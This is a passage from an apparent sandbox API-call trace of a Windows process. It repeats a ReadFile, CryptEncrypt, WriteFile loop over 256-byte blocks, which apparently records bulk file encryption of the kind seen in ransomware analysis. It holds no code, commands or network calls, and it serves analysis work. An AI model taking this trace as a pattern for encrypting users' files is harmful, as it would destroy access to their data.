lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.047] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.047] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.047] GetLastError () returned 0x0 [0172.047] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.047] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.047] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.047] GetLastError () returned 0x0 [0172.047] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.047] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.047] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.047] GetLastError () returned 0x0 [0172.047] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.047] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.047] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.047] GetLastError () returned 0x0 [0172.047] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.047] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.047] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.047] GetLastError () returned 0x0 [0172.047] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.047] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.047] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.047] GetLastError () returned 0x0 [0172.047] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.048] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.048] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.048] GetLastError () returned 0x0 [0172.048] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.048] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.048] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.048] GetLastError () returned 0x0 [0172.048] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.048] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.048] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.048] GetLastError () returned 0x0 [0172.048] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.048] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.048] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.048] GetLastError () returned 0x0 [0172.048] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.048] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.048] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.048] GetLastError () returned 0x0 [0172.048] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.048] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.048] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.048] GetLastError () returned 0x0 [0172.048] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.048] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.049] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.049] GetLastError () returned 0x0 [0172.049] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.049] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.049] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.049] GetLastError () returned 0x0 [0172.049] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.049] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.049] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.049] GetLastError () returned 0x0 [0172.049] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.049] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.049] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.049] GetLastError () returned 0x0 [0172.049] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.049] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.049] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.050] GetLastError () returned 0x0 [0172.050] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.050] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.050] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.050] GetLastError () returned 0x0 [0172.050] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.050] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.050] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.050] GetLastError () returned 0x0 [0172.050] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.050] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.050] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.050] GetLastError () returned 0x0 [0172.050] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.050] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.050] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.050] GetLastError () returned 0x0 [0172.050] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.050] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.050] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.050] GetLastError () returned 0x0 [0172.050] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.050] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.050] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.050] GetLastError () returned 0x0 [0172.050] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.051] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.051] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.051] GetLastError () returned 0x0 [0172.051] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.051] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.051] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.051] GetLastError () returned 0x0 [0172.051] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.051] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.051] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.051] GetLastError () returned 0x0 [0172.051] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.051] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.051] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.051] GetLastError () returned 0x0 [0172.051] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.051] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.051] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.051] GetLastError () returned 0x0 [0172.051] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.051] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.051] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.051] GetLastError () returned 0x0 [0172.051] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.052] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.052] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.052] GetLastError () returned 0x0 [0172.052] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.052] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.052] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.052] GetLastError () returned 0x0 [0172.052] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.052] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: 